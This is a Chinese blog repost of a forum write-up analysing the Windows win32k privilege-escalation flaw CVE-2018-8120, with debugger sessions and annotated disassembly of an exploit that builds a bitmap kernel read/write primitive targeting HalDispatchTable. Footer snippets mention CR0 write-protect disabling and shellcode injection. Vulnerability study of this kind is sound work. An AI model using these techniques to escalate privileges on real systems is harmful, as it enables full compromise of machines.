windows修改内存读写权限_Windows提权逆向

最新推荐文章于 2023-06-22 15:03:44 发布
最新推荐文章于 2023-06-22 15:03:44 发布
阅读量598 收藏 2
点赞数
文章标签: windows修改内存读写权限

本文为看雪论坛优秀文章

看雪论坛作者ID:东方二狗

目录

  • 01 Windows内核提权思路
  • 提权一
  • 提权二
  • 提权三
  • 02 成因
  • 03 利用
  • 04 逆向
  • 窗口站
  • SetBitmap
  • 总结

一个小白对于Windows提权以及逆向的学习,文章中说的思路可能有不对的,希望不要介意!!!

01 Windows内核提权思路

内核提权最终都是通过读写来做一些事情所有内核提权都是获取一个system值 从而获得最高权限。

>>>>提权一

替换当前进程EPROCESS结构的token为system的token。

>>>>提权二

替换当前进程EPROCESS结构体token所指向的数据。

>>>>提权三

3环直接写shellcode是不行的因为当前 进程eprocess位于内核空间,要进行读写代码必须在0环中,如果在3环进行读写会出现保护异常。用户层可以通过调用系统服务来访问内核层代码。

02 成因

win32k.sys组件中创建窗口站对象(CreateWindowStationW)时候,SetImeInfoEx函数没有对指针进行安全验证; 对应指针指向零页内存,然后在它下一次使用之前有代码对该区域进行修改触发蓝屏。

03 利用

需要提权申请一块堆大小并且构造这块内存中的数据释放后指向shellcode位置,当提权完成后再恢复这块数据。

04 逆向

以2018-8120为例子进行傻瓜式分析开始啦,前提需要进入当前进程所对应的内核空间。

1: kd> !process 0 0 test.exe
1: kd> .process /i 87b06c08
1: kd> g
0: kd> .reload /f /user
0: kd> .process

b6b26cd582f10ec6173c4dff993de7b1.png

>>>>窗口站

窗口站是和当前进程和会话(session)相关联的一个内核对象,它包含剪贴板(clipboard)、原子表、一个或多个桌面(desktop)对象。

用户调用CreateWindowStation创建新的窗口站时,最终会调用内核函数xxxCreateWindowStation执行窗口站的创建,但是在该函数执行期间,被创建的新窗口站实例的spklList指针并没有被初始化,指向的是空地址。

a.HWINSTA hSta = CreateWindowStationW(0, 0, READ_CONTROL, 0);

hSta 句柄=58,对应在内核中窗口站地址是87a85d48:

001b:01246909 8bf4 mov esi,esp //
001b:0124690b 6a00 push 0        //0
001b:0124690d 6800000200      push 20000h //READ_CONTROL
001b:01246912 6a00 push 0   //0
001b:01246914 6a00 push 0   //0
001b:01246916 ff1588522c01 call dword ptr [test!_imp__CreateWindowStationW (012c5288)]

304ee5aa988275983d54408071fd4e51.png

b.CreateBitmap getpvscsn0

下断点得到下边四个值CreateBitmap创建的句柄是gManger=1205067e。

001b:012469be 8bf4 mov esi,esp
001b:012469c0 8d85d0fcffff lea eax,[ebp-330h] //002cf450 00000090
001b:012469c6 50              push eax //eax=002cf450=buff
001b:012469c7 6a20 push 20h
001b:012469c9 6a01 push 1
001b:012469cb 6a01 push 1
001b:012469cd 6a60 push 60h
001b:012469cf ff1504502c01 call    dword ptr [test!_imp__CreateBitmap (012c5004)]

同理所得:gWorker=180504e7 mpv=fe667038,wpv=fdab8368

//堆栈变化
002c30e4 00000060
002c30e8 00000001
002c30ec 00000001
002c30f0 00000020

4bf74eb8bb370447115bc5c5c1070431.png

c.自己申请一块空间的地址

构造tagkl(目标键盘布局)对象的结构体指针piiex指向的输入法信息对象的缓冲区。

001b:01246a66 c78594fcffff00000000 mov dword ptr [ebp-36Ch],0    //002cf414 00000000 ==>P_tagKL pkl =0
001b:01246a70 8b8594fcffff mov eax,dword ptr [ebp-36Ch] //eax=00000000==>pkl->hkl
001b:01246a76 8b8da0fcffff mov ecx,dword ptr [ebp-360h] //ecx=fdab8368=wpv
001b:01246a7c 894814          mov dword ptr [eax+14h],ecx //[eax+14]==>[0+14]==>pkl->hkl = (HKL__ *)wpv;
001b:01246a7f 8b85acfcffff mov eax,dword ptr [ebp-354h]
001b:01246a85 83e804 sub eax,4   //eax-4=eax=fe667034
001b:01246a88 8b8d94fcffff mov ecx,dword ptr [ebp-36Ch] //002cf414 00000000 ==>ecx=00000000==>pkl
001b:01246a8e 89412c mov dword ptr [ecx+2Ch],eax //eax=fe667034==>0000002c fe667034
001b:01246a91 685c010000 push 15Ch
001b:01246a96 8d8530fbffff lea eax,[ebp-4D0h]
001b:01246a9c 50              push eax
001b:01246a9d e816c7ffff call test!ILT+435(_RtlSecureZeroMemory) (012431b8)

自己申请内存地址初始化002cf2b0 =0xccc。

1c77c1ff8b67d96ce6cff72a0054be32.png

当触发漏洞时候:002cf2b0变成自己构造的数值了具体汇编这里不做过多的介绍了。

fe540ef8bfb4782e3ff20d8273a7df41.png

下图书触发漏洞以及在申请的内存里面构造了自己需要的数据。

7761bd490314876886e1cb0711e3055d.png

4065b03d918213aa108b046140b1b83d.png

验证自己找的gManger gWork等值是否正确。

d67c40d53b15eb8764690ad7970c0c16.png

>>>>SetBitmap

a. Bitmap分析

思路:SetBitmapBits --> NtGdiSetBitmapBits --> GreSetBitmapBits --> bDoGetSetBitmapBits--> memcpy

(1)setbitmap代码分析

SetBitmapBits((HBITMAP)gManger, sizeof(PVOID), &oaddr);

001b:01246be5 8bf4 mov esi,esp
001b:01246be7 8d850cfbffff lea eax,[ebp-4F4h] &oaddr
001b:01246bed 50              push eax //eax=002cf28c
001b:01246bee 6a04 push 4                            // 00000004 ==》sizeof
001b:01246bf0 8b8dc4fcffff mov ecx,dword ptr [ebp-33Ch] //1205067e==》gManger
001b:01246bf6 51              push ecx //push 1205067e
001b:01246bf7 ff1508502c01 call dword ptr [test!_imp__SetBitmapBits (012c5008)]

NtGdiSetBitmapBits(int a1, SIZE_T Size, PVOID Address)

b. bp win32k!NtGdiSetBitmapBits下断点进行分析

v6 = GreSetBitmapBits(a1, Size, Address, &v4);进行分析。

win32k!NtGdiSetBitmapBits+0x67:
940d3b0b 8d45dc lea eax,[ebp-24h] 8c16abe8 8c16abfc
940d3b0e 50              push eax //push 8c16abfc==>&v4 ==>8c16abfc 00000000 ==>0
940d3b0f ff7510 push dword ptr [ebp+10h] //002cf28c ==> Address ==>002cf28c 83f6e3fc nt!HalDispatchTable+0x4
940d3b12 ff750c push dword ptr [ebp+0Ch] //push 00000004 ==>sizeof
940d3b15 ff7508 push dword ptr [ebp+8] //push 1205067e ==>gManger==>a1
940d3b18 e8dbcf0800 call win32k!GreSetBitmapBits (94160af8)

c.bp win32k!bDoGetSetBitmapBits下断点进行分析

v9是算出来的计算公式如下:

cdc98a28621028fe3f8a4b5de8c01536.png

2fd69dcc3e78844470303458509e10a0.png

代码如下:

win32k!GreSetBitmapBits+0x169:
94160c61 53              push ebx
94160c62 8d4d80 lea ecx,[ebp-80h] 8c16ab44 00000000
94160c65 51              push ecx //8c16ab40 8c16ab54 ==>ecx=8c16ab54==>(struct _SURFOBJ *)&v12 ==> _SURFOBJ *a2
94160c66 50              push eax //8c16ab3c fe667018 ==>eax = fe667018 ==》v9=fdf6bd38 +20= FDF6BD58 =wpv ==> _SURFOBJ *a1
/*

*/
94160c67 e8a5000000 call win32k!bDoGetSetBitmapBits (94160d11)

v9计算过程gManager句柄的后3位,wpv+20位置。

72c400795088d7f181253995b49c5e76.png

ce59e35f31bbde54e5f684555691c480.png

(1)由于漏洞中的memcpy大小不可控,所以回覆盖一部分的SURFOBJ成员,所以我们需要修复某些在Set/GetBitMapBits时所必须的成员

利用Bitmap内核对象中的pvScan0字段+10的位置系统API的GetBitmapBits和SetBitmapBits可以读写pvScan0所指向内存地址的内容。

(2)因此这个v9计算公式俩种。

d.拷贝

win32k!bDoGetSetBitmapBits+0x30a:
9416101b c745fc05000000 mov dword ptr [ebp-4],5   8c16ab30 00000005
94161022 53              push ebx ebx=00000004
94161023 ff750c push dword ptr [ebp+0Ch] 8c16ab40 002cf28c ==>002cf28c==>002cf28c 83f6e3fc nt!HalDispatchTable+0x4
94161026 ff7508 push dword ptr [ebp+8] 8c16ab3c fdab8368 ==》fdab8368==》wpv
 
win32k!bDoGetSetBitmapBits+0x318:
94161029 e87208ffff call    win32k!memcpy (941518a0) fdab8368 ==>wpv

392fff012a4bba01a5c4a7a921a5986f.png

>>>>总结

剩下的GetBitmapBits以及需要逆向的其他函数都是类似操作只要知道调用哪个函数就可以动态跟踪里面数据。

e7be15140776a65712c20efeb3eb5310.png

- End -

看雪ID:东方二狗

https://bbs.pediy.com/user-798435.htm

*本文由看雪论坛 东方二狗 原创,转载请注明来自看雪社区

推荐文章++++

* AFL afl_fuzz.c 详细分析

* 小白的CVE-2010-0249——极光行动漏洞分析

* 一款二代壳的脱壳成长之路

* 手动打造应用层钩子扫描

* 跨平台模拟执行 - AndroidNativeEmu实用手册

f4ec45aaee437a3b828cdd748302ac6c.png
weixin_39857792
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
c#中用windows api函数修改内存数据
jinjazz
04-28 5109
这个问题来自伴水的《划拳机器人》,对本文用途感兴趣的朋友请大致阅伴水的帖子,在帖子中我用这个方法了剪刀五号,战绩不错,当然属于作弊的方法了。剪刀五号的思路就是每次出拳,尽量让对方能赢,然后根据一个地址段来扫描内存中对方所赢的局数的保存地址,找到后在得到比赛结果时把内存数据改掉。这个类似以前打单机游戏时用的fpe之类的修改工具。当然,如果对方故意犯规,一局也不赢,你是找不到他的地址的
内核修改内存权限
水墨画
12-20 1506
修改成可__asm { push eax mov eax, CR0 and eax, 0xFFFEFFFF mov CR0, eax pop eax }恢复__asm { push eax mov eax, CR0 or eax, NOT 0xFFFEFFFF mov CR0, eax pop eax }
windows修改内存权限_内存去哪了
weixin_39776787的博客
11-21 288
刚才回答了个问题,觉得回答不太完整,就篇文章详细阐述下自己的想法。win10内存的利用规律是什么,为什么有些时候会自己回收内存?​www.zhihu.com内存买来就是拿来用的,所以内存被占满了,肯定是数据干的。那么具体是什么数据呢?我们先来给数据划分几种类型:1.有用数据,就是程序主动申请起来的数据。2.缓存数据,就是操作系统把文件内存里,当你访问文件的时候直接内存就行了。先声明,缓存数...
windows修改内存权限_Linux进程间通信——内存共享映射
weixin_39996798的博客
10-21 273
一、概念什么是内存共享映射?将磁盘文件的一部分直接映射到内存中共享内存,就是两个或多个进程都可以访问的同一块内存空间,一个进程对这块空间内容的修改可为其他参与通信的进程所看到的映射种类共享映射(share),内存中数据修改时,磁盘对应也同时修改私有映射(private),内存中数据修改时,磁盘不修改内存共享特点实现进程间通信最简单也是最直接的方法就是共享内存——为参与通信的多个进程在内存中开辟一个...
初探——内存内核达到
Leon的博客
03-19 2521
起因:一个Ubuntu 16.04 漏洞的修复 漏洞概况: 这次的 EXP 在于Linux内核带有的eBPF bpf(2)系统调用中,当用户供恶意BPF程序使eBPF验证器模块产生计算错误,导致任意内存问题。 非特用户可以使用此漏洞获得权限升。 漏洞重现 自己有很多Centos的服务器,唯一一台Ubuntu的还是4.4.0 -117的,所以向朋友借了一台服务器,刚刚好是4.3...
vc.rar_内存 _内存 驱动_驱动级 内存_驱动_驱动内存
09-22
这些知识不仅适用于驱动级内存,也是系统编程和逆向工程的基础。对于有兴趣深入研究操作系统内部运作或者从事相关开发工作的人员来说,这些都是必不可少的技能。在学习过程中,一定要注意遵循安全规范,避免对...
X64进程驱动_器_驱动程序
09-20
4. **权限控制**:理解Windows的安全模型,确保驱动程序在进行内存访问时遵循权限规则,防止权限滥用。 5. **异常处理**:当操作遇到错误或者异常时,需要有恰当的错误处理机制,避免系统崩溃。 6. **调试技巧...
精选_根据进程PID指定进程的内存数据_源码打包
03-08
综上所述,这个压缩包供的源码很可能是一个实用工具,展示了如何在Windows环境中通过进程PID来指定进程的内存数据,涉及到了操作系统底层的编程技术,对于学习系统编程和逆向工程的开发者来说具有很高的参考...
windows修改/获取其他进程指定地址空间的内容的工具
最新发布
09-07
Windows操作系统中,有时我们需要对其他进程的内存空间进行取或入操作,这在软件调试、逆向工程或者安全研究中非常常见。本文将详细介绍如何利用`ReadProcessMemory`和`WriteProcessMemory`这两个关键函数来...
易语言对64位程序内存操作纯模块源码
05-27
本主题聚焦于易语言在处理64位程序内存操作方面的应用,这对于理解底层数据处理、游戏修改、软件调试等领域非常重要。 在64位操作系统环境下,程序的内存管理与32位系统有很大不同。64位程序可以访问的内存地址...
进程注入之进程
WgpSec狼组安全团队
06-04 1137
本文作者:Gality 本文字数:7928字 阅时长:20分钟 本文属于【狼组安全社区】原创奖励计划,未经许可禁止转载 由于传播、利用此文所供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,狼组安全团队以及文章作者不为此承担任何责任。 狼组安全团队有对此文章的修改和解释。如欲转载或传播此文章,必须保证此文章的完整性,包括版声明等全部内容。未经狼组安全团队允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。 最近在研究进程注入相关的东西,主要是参考process-
[] 使用 ShellCode 注入其他进程
LYSM
11-27 1002
背景 如果将shellcode注入到具有特定权限的进程中,使用 ShellCode 创建的进程就可以获得与该进程相同的权限。 本次使用的工具,依旧是上次编的PETools: https://www.cnblogs.com/LyShark/p/12960816.html 工具下载地址: https://www.blib.cn/soft/pexec.zip 枚举系统进程,与进程权限令牌等。 #include <stdio.h> #include <Windows.h> #inc
技术之给任意进程(我们以OD,CE为例)
a756598009的博客
06-22 833
赋予进程某种特殊权限 也叫权限 那么为什么要权限呢 如果我们想修改游戏内存数据 数字的话正常情况下我们无法进行跨进程内存 这时候就可以使用 升自身辅助进程的权限 来达到能游戏内存的效果那的原理又是什么呢?游戏虽然做了自身的进程保护 不允许其他进程 但是我们电脑系统本身就是有系统自带的进程winlogon.exe 这进程为例,这个进程是可以随意游戏内存的 游戏的保护也会过滤掉系统进程对自身的
python3从零学习-5.8.4、mmap—内存映射文件支持
山海皆可平z
06-15 601
mmap — 内存映射文件支持 内存映射(mmap)文件对象的行为既像 bytearray 又像 文件对象。 你可以在大部分接受 bytearray 的地方使用 mmap 对象;例如,你可以使用 re 模块来搜索一个内存映射文件。 你也可以通过执行 obj[index] = 97 来修改单个字节,或者通过对切片赋值来修改一个子序列: obj[i1:i2] = b'...'。 你还可以在文件的当前位置开始取和入数据,并使用 seek() 前往另一个位置。 内存映射文件是由 mmap 构造函数.
10. 存取控制
showna的专栏
03-28 4036
 Microsoft Windows 2000供了广泛且具高度弹性的安全功能,在现今市场上没有其他的作业系统能在安全对象上供细微的控制。而Windows实作了 存取控制 部份,所以可以达到如此重要的程度。存取控制简介 一般来说,当人们到「Windows安全性」,即是指实作Windows的 存取控制 部份。存取控制可以被解释为指派及强制可以或不可以在安全对象上执行某些动作。Wi
windows修改内存权限_Windows下网站目录777可权限设置方法
weixin_39922749的博客
11-05 2047
首先,我们打开文件根目录,比如D盘mingdengsoft这个文件夹,点击需要设置权限的文件夹,比如我们可以右击data文件夹,点属性上方的标签选第二个按键“安全”,然后选择中间的“添加”按键,在出现的新窗口中,选择左下角的“高级”,选择新跳出窗口右侧中部的“立即查找”键,在下方出现的搜索结果中,选择一个名称为“IUSR_”开头的项目,选中他后,点上方的确定,下面在点确定,这时就会回到一开始dat...
windows修改内存权限_如何理解虚拟内存
weixin_39692557的博客
11-21 572
为什么不直接使用物理内存 虚拟内存是计算机系统内存管理的一种技术。它使得应用程序认为它拥有连续可用的内存(一个连续完整的地址空间),而实际上,它通常是被分隔成多个物理内存碎片,还有部分暂时存储在外部磁盘存储器上,在需要时进行数据交换。 现代所有用于一般应用的操作系统都对普通的应用程序使用虚拟内存技术,老一些的操作系统,如DOS和1980年代的Windows,或者那些1960年代的大型机,一般都没有...
WDM驱动程序开发之应用程序测试篇CreateFile,ReadFile,WriteFile,DeviceIoControl,CloseHandle.
03-21 5034
 一、*****CreateFile*****    这个函数可以创建或打开一个对象的句柄,凭借此句柄就可以控制这些对象:控制台对象、通信资源对象、目录对象(只能打开)、磁盘设备对象、文件对象、邮槽对象、管道对象。    函数原型:HANDLE CreateFile(  LPCTSTR lpFileName,                         // file name对象路径名  D
windows修改文件权限
06-02
Windows修改文件或目录的权限,可以按照以下步骤进行: 1. 找到需要修改权限的文件或目录,右键点击该文件或目录,选择“属性”选项。 2. 在弹出的属性窗口中,选择“安全”选项卡。 3. 在“安全”选项卡中,可以看到当前文件或目录的权限设置。点击“编辑”按钮,进入权限编辑界面。 4. 在权限编辑界面中,可以选择添加或删除用户或用户组,并设置相应的权限。 5. 在设置完权限后,点击“确定”按钮保存设置,即可完成文件或目录权限修改。 需要注意的是,修改文件或目录权限需要具有管理员权限或拥有相应的权限。如果你没有权限修改文件或目录的权限,需要联系管理员或拥有权限的用户进行修改
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值